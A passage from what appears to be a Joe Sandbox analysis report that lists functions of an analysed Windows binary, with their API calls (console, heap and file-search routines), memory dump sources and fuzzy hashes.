                                                                                                                                                                        Function 00007FF6E9432EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4254246844-0
                                                                                                                                                                        • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                                                                                        • Instruction ID: 12b563f7c100edb412fb752c3c066078e3a9841c1448a9ce836a221fd10ed234
                                                                                                                                                                        • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                                                                                        • Instruction Fuzzy Hash: 76418C23A09742D6EA20DF30E44837967A0EF99B84F548530DE4E87785EE3EE449C70A
                                                                                                                                                                        Function 00007FF6E943498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2643372051-0
                                                                                                                                                                        • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                                                                                        • Instruction ID: 625702563c9d8f7f67a4f7f72ccef8d95b4b5ddbbd47fb0f7ebcc28dbd2154a0
                                                                                                                                                                        • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                                                                                        • Instruction Fuzzy Hash: DAF086B3A19B46C5EB049F75F4442796AE1FF5E7A0B459234C92E83391EE3D944CC305
                                                                                                                                                                        Function 00007FF6E9435A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_osfhandle$ConsoleMode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1591002910-0
                                                                                                                                                                        • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                        • Instruction ID: c8a2111804c62b25ae75e43f098399c7c2e4dab27355f7f5b984c129ebbbac2a
                                                                                                                                                                        • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                        • Instruction Fuzzy Hash: 63F062B6A19702CBE7148F50E8552787BA0FF8E711B444135C90A83321DE3EA40DCB0A
                                                                                                                                                                        Function 00007FF6E943291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DriveType
                                                                                                                                                                        • String ID: :
                                                                                                                                                                        • API String ID: 338552980-336475711
                                                                                                                                                                        • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                        • Instruction ID: a7bed3ff1cc0aaa4c24b84637877993dfc0e89d169c3b78b9a0e391ea8c7ca19
                                                                                                                                                                        • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9AE06D67618641C7E7209FA0E4511AAB7A0FF8D748F841529EA8D83724DF3CD249CB0D
                                                                                                                                                                        Function 00007FF6E9435AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE ref: 00007FF6E9435B52
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E9434297
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E94342D7
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: memset.MSVCRT ref: 00007FF6E94342FD
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: memset.MSVCRT ref: 00007FF6E9434368
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E9434380
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: wcsrchr.MSVCRT ref: 00007FF6E94343E6
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: lstrcmpW.KERNELBASE ref: 00007FF6E9434401
                                                                                                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF6E9435BC7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 497088868-0
                                                                                                                                                                        • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                        • Instruction ID: 63002f12f2f45b4917f73905c18553c902de97b199cf968fb5253802e7cd9eab
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                        • Instruction Fuzzy Hash: B8318222A1C642C2FA24EF31A4547BD6291BF89BC0F445431E94EC7B95DE3EE549C70A
                                                                                                                                                                        Function 00007FF6E9433A0C Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindClose.KERNELBASE(?,?,?,00007FF6E944EAC5,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9433A56
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFind
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                                                        • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                                                                                        • Instruction ID: 9a32c0faa4a013506eb30940c3d63769933f824296014b4f143df863f20a6a7a
                                                                                                                                                                        • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                                                                                        • Instruction Fuzzy Hash: FB01D672E28643D6E714CF75A45433966A0EF84F40F909630D90DC3645DE2EF589C309
                                                                                                                                                                        Function 00007FF6E9439A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1412018758-0
                                                                                                                                                                        • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                        • Instruction ID: 24e90ddcdf1cbd5e8fc324478c14a78bb300ceec2ecef5aad7b76efbb486a78c
                                                                                                                                                                        • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                        • Instruction Fuzzy Hash: 2AE09203F6A34BD1FF14BFB2684A37812505F18741F081530CD0D85382EE2EA09DC31A
                                                                                                                                                                        Function 00007FF6E942CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                        • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                        • Instruction ID: afb262c4e7b4d1f789f5894ebf3d42889458b3332480acb6b90621e7e466b21c
                                                                                                                                                                        • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                        • Instruction Fuzzy Hash: A8F01973E28642C6EB148F15F84067CBBA1FF89B41B589534D90E83365DF3EA449C709
                                                                                                                                                                        Function 00007FF6E9434C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: exit
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2483651598-0
                                                                                                                                                                        • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                        • Instruction ID: 1cf6ec1911cf339355e8538ecfa94cb2b605629a0706ab535107191b69e0917c
                                                                                                                                                                        • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                        • Instruction Fuzzy Hash: 91C0803270464AC7EF1CEF7124651BD15545F08301F05543CC907C1382DE2DD40CC709
                                                                                                                                                                        Function 00007FF6E9435508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DefaultUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3358694519-0
                                                                                                                                                                        • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                        • Instruction ID: d724f958552c4f07faf4e14e6cc65a9f9d97669acaec54717c708fa885029cb3
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                        • Instruction Fuzzy Hash: 84E08CA3D08262CAF65C6E71A0493BC2993CF68782FC44031CA0D81A884D2E3849D30E
                                                                                                                                                                        Function 00007FF6E9432E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                        • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                        • Instruction ID: 9c13c1979446f7af8cd0720ea07126c0af3c989738780fd673ed8b4a80074967
                                                                                                                                                                        • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                        • Instruction Fuzzy Hash: C1F0BE22B0978680EA44CB76B94522962909F88BF0F088330EA7C87BC9EE3CD452C305

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 00007FF6E9447F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9447F44
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9447F5C
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9447F9E
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9447FFF
                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448020
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448036
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448061
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9448075
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94480D6
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E94480EA
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E9448177
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E944819A
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E94481BD
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E94481DC
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E94481FB
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E944821A
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E9448239
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448291
                                                                                                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94482D7
                                                                                                                                                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94482FB
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E944831A
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448364
